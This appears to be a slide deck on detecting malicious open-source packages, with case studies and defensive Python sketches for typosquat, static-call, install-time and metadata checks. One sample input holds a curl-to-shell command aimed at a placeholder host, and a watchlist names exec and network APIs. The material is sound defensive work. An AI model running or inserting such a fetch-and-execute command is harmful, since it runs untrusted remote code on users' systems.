Mitigating Open-source Software Supply Chain Attacks

Ashish Bijlani, Ajinkya Rajput
Ossillate Inc.

The state of open-source software
• De-facto standard way of developing digital products/services
• Open-source software makes up at least 70% of all software
  ◦ Source: 2020 Synopsys report

“Software is eating the world” - Marc Andreessen, 2011
“Open-source software is eating the world” - Everybody, 2021

Open-source software distribution: packages
• Code is “packaged” and published on Package Managers
  ◦ Example: PyPI hosts over 300K Python packages
• Code is “sourced” from Package Managers by installing packages
  ◦ Example: pip3 install dateutils

In open-source software, we trust
• Anybody can publish packages
  ◦ Individual developers, groups, and companies
• Software we use on our servers, laptops, phones, coffee makers, baby monitors, <add your favorite digital device here> is written by unknown volunteers
  ◦ Which we blindly TRUST?

Bad actors capitalize on our trust by exploiting weaknesses in the code we source AS WELL AS the way we source it

Security weaknesses in the code (a.k.a. vulnerabilities)
• Are programming bugs introduced accidentally
  ◦ Example: buffer overflow (due to missing bounds checks)
• Pose indirect threats
  ◦ Need an exploit to trigger the buggy code
  ◦ May not always have a high impact
• Can be fixed by upgrading to the latest version/release

Security weaknesses in the distribution/sourcing process
• Anybody can publish their packages using their credentials
• No checks or code vetting
• Packages are searched and installed using names
  ◦ Package Managers (e.g., PyPI, npm) do not show source code
• Bad actors exploit new attack vectors to propagate malware

Malware in open-source software packages

Case study: mitmproxy2
- Typosquatting attack
- Impersonates “mitmproxy”
- Exploits name typo during installation or dev inexperience
- Removes safeguards: everyone on the same network can execute code on your machine with a single HTTP request
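One way to catch a typosquat like this before installing is to compare the requested name against names you already trust. The sketch below is only an illustration, not the detection method used in this work: the `POPULAR_PACKAGES` list, the `possible_typosquat_of` helper, and the 0.85 similarity threshold are all assumptions chosen for the example.

```python
from difflib import SequenceMatcher

# Hypothetical allowlist of well-known package names; a real tool would
# load a much larger list (e.g. the most-downloaded packages on PyPI).
POPULAR_PACKAGES = ["mitmproxy", "requests", "numpy", "dateutils"]


def normalize(name: str) -> str:
    """Lowercase and treat '-', '_' and '.' as equivalent, similar to
    PyPI's name normalization."""
    return name.lower().replace("_", "-").replace(".", "-")


def possible_typosquat_of(name: str, threshold: float = 0.85):
    """Return the popular package that `name` closely resembles, or None.

    An exact match is the real package itself, so it is not flagged.
    """
    candidate = normalize(name)
    targets = {normalize(p): p for p in POPULAR_PACKAGES}
    if candidate in targets:
        return None
    for target, popular in targets.items():
        # ratio() is a similarity score in [0, 1]; the threshold is arbitrary.
        if SequenceMatcher(None, candidate, target).ratio() >= threshold:
            return popular
    return None


if __name__ == "__main__":
    for requested in ("mitmproxy2", "mitmproxy", "flask"):
        print(requested, "->", possible_typosquat_of(requested))
```

A name-similarity check only covers typosquatting; it says nothing about what the package code actually does.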

Case study: rest-client RubyGems package (100M+ downloads)
In production environments, it downloads a malicious payload from pastebin.com and executes it via eval, which installs a Remote-Code-Execution (RCE) backdoor on web servers

Unlike vulnerabilities, malware
• Is intentionally harmful code (NOT an accidental programming bug)
  ◦ Example: backdoor installed to steal sensitive data
• Poses direct and dangerous threats
  ◦ Doesn’t need an exploit - it is itself an exploit (e.g., triggered on installation)
  ◦ Is obfuscated to avoid detection
  ◦ Is hidden in popular packages for wider reach
  ◦ Is evasive - may only trigger under narrow conditions (e.g., production)
• Can only be fixed by yanking the malicious package/dependency version

Can we improve the sourcing process?
• Today, package stability/maturity/popularity/reputation/safety is inferred from
  ◦ Number of GitHub stars/forks
  ◦ Number of open issues on GitHub
  ◦ Number of downloads
  ◦ Project documentation/website
  ◦ Number of recent code commits
  ◦ Number of test cases
  ◦ Backing companies (e.g., FB, Uber)
• BUT
  ◦ Stars/forks/downloads are attacker-controlled
  ◦ Impersonated projects have the same website/documentation/tests/commits
  ◦ Should we look at the package code and hundreds of dependencies?

Our focus
1. Background
2. Malware in open-source software
3. Our work
4. Findings

About me
Ashish Bijlani, Ph.D.
Research Scientist, Ossillate, Inc.
- Graduated Dec’20, Georgia Tech
- Cybersecurity/Systems research
- Creator of ExtFUSE file system
  - eBPF + FUSE = Much faster FUSE
- Created a 32-bit x86 OS (Capital) that boots from a 5.25” floppy disk

Our work
• Started as a research project at Georgia Tech in 2019
  ◦ Downloaded and analyzed over 1.3M npm + PyPI + RubyGems packages (60TB)
  ◦ Detected 339 previously unknown malicious packages (82% confirmed, 3 CVEs, many over a year old)
  ◦ Details in academic paper: https://arxiv.org/pdf/2002.01139.pdf
• Funded by NSF to continue development
• Continuous scanning of packages
  ◦ PyPI supported (more coming soon!)

Our technology
- Deep static analysis (Abstract Syntax Tree construction + API analysis)
- Dynamic analysis (API monitoring during installation)
- Metadata analysis (millions of data points)
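To make the static-analysis bullet concrete, here is a minimal sketch of AST construction followed by API analysis, using Python's standard `ast` module. It is not the Ossillate analyzer: the `SUSPICIOUS_CALLS` watchlist and the helper names are assumptions made for illustration, and a real analyzer would also need to resolve import aliases and obfuscated call targets.

```python
import ast

# Hypothetical watchlist of calls that often appear in install-time malware.
SUSPICIOUS_CALLS = {
    "eval", "exec", "os.system", "subprocess.Popen",
    "subprocess.run", "urllib.request.urlopen",
}


def dotted_name(node: ast.AST) -> str:
    """Rebuild a dotted name such as 'os.system' from a call target."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""  # e.g. a call on the result of another call


def find_suspicious_calls(source: str):
    """Return sorted (line, call_name) pairs for watchlisted calls."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)


if __name__ == "__main__":
    sample = (
        "import os\n"
        "os.system('curl http://example.invalid | sh')\n"
        "x = eval('1+1')\n"
    )
    for line, call in find_suspicious_calls(sample):
        print(f"line {line}: {call}")
```

Because the source is only parsed and never executed, this kind of check is safe to run on untrusted packages, but simple name matching is easy to evade (for example with `import os as o`).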

Our recent findings (malicious PyPI packages)
- https://pypi.org/project/dandh811/
- https://pypi.org/project/KrisQian/
- https://pypi.org/project/dpp-client
- https://pypi.org/project/defal96863
- https://pypi.org/project/idodaniel/
- and more...

Findings: malware 1
- Homepage redirects to billibilli.com
- setup.py downloads and executes a script with hidden output
- Payload execution code is present for Windows and Linux; it is commented out for Darwin
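Install-time behaviour like this is what API monitoring during installation is meant to surface. The sketch below approximates the idea with CPython's audit hooks (`sys.addaudithook`, Python 3.8+). It is an assumption-laden illustration rather than the monitoring used in this work: `WATCHED_EVENTS` and `run_monitored` are hypothetical names, and the monitored code really does run, so this belongs inside a disposable sandbox or container only.

```python
import sys

# Audit event names raised by CPython for the APIs of interest.
# The selection is an assumption made for this example.
WATCHED_EVENTS = {
    "os.system", "subprocess.Popen", "socket.connect", "urllib.Request",
}

observed = []        # (event, args) tuples recorded while monitoring
_monitoring = False  # the hook is process-wide, so gate it with a flag


def _hook(event, args):
    if _monitoring and event in WATCHED_EVENTS:
        observed.append((event, args))


sys.addaudithook(_hook)  # audit hooks cannot be removed once installed


def run_monitored(code: str):
    """Execute `code` (e.g. a setup.py body) and return watched events.

    WARNING: the code is executed for real; only use this in a sandbox.
    """
    global _monitoring
    observed.clear()
    _monitoring = True
    try:
        exec(compile(code, "<setup.py>", "exec"), {"__name__": "__main__"})
    finally:
        _monitoring = False
    return list(observed)


if __name__ == "__main__":
    for event, args in run_monitored("import os\nos.system('exit 0')\n"):
        print(event, args)
```

Unlike static analysis, this observes what the code actually does, but only along the paths that execute, so malware that triggers under narrow conditions can still go unnoticed.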

Findings: malware 2
- Invalid email
- Homepage redirects to injection.vip
- setup.py downloads and spawns a Python file (the download server is unreachable now)
- A comment says the package is for security testing only, but the payload is unavailable
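Signals such as an invalid email are the kind of thing metadata analysis can check without reading any code. The following is a minimal sketch under stated assumptions: `metadata_red_flags` is a hypothetical helper, the `author_email` and `home_page` keys are assumed to follow the `info` section of PyPI's JSON metadata, and the checks are purely syntactic (detecting a redirect would require fetching the homepage).

```python
import re
from urllib.parse import urlparse

# Deliberately loose syntactic check; it does not prove the address exists.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def metadata_red_flags(meta: dict) -> list:
    """Return human-readable warnings for suspicious package metadata."""
    flags = []

    email = (meta.get("author_email") or "").strip()
    if not EMAIL_RE.match(email):
        flags.append("invalid author email")

    homepage = (meta.get("home_page") or "").strip()
    parsed = urlparse(homepage)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        flags.append("missing or malformed homepage")

    return flags


if __name__ == "__main__":
    print(metadata_red_flags({"author_email": "nobody", "home_page": ""}))
```

None of these flags is proof of malice on its own; they are weak signals meant to be combined with the static and dynamic results.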

Announcing three FREE tools for developers (in BETA)
• Smart assistant for sourcing open-source software packages
  ◦ Package explorer - web app at https://ossillate.com
  ◦ Command line - PyPI package (releasing later today!)
  ◦ GitHub Actions plugin (coming soon!)
• Flag packages that are:
  ◦ Malicious (malware)
  ◦ Suspicious (potentially malicious)
  ◦ Vulnerable (containing CVEs)
  ◦ Undesirable (possessing unwanted attributes)
• Supported Package Managers
  ◦ PyPI, more coming soon!

Thank you!
Visit us at ossillate.com
Write to us: [email protected]
Get in touch with us on Slack: https://join.slack.com/t/ossillatecommunity/shared_invite/zt-yfezeo6u-Fb5iBqODh2UJT1i8LmAjMQ
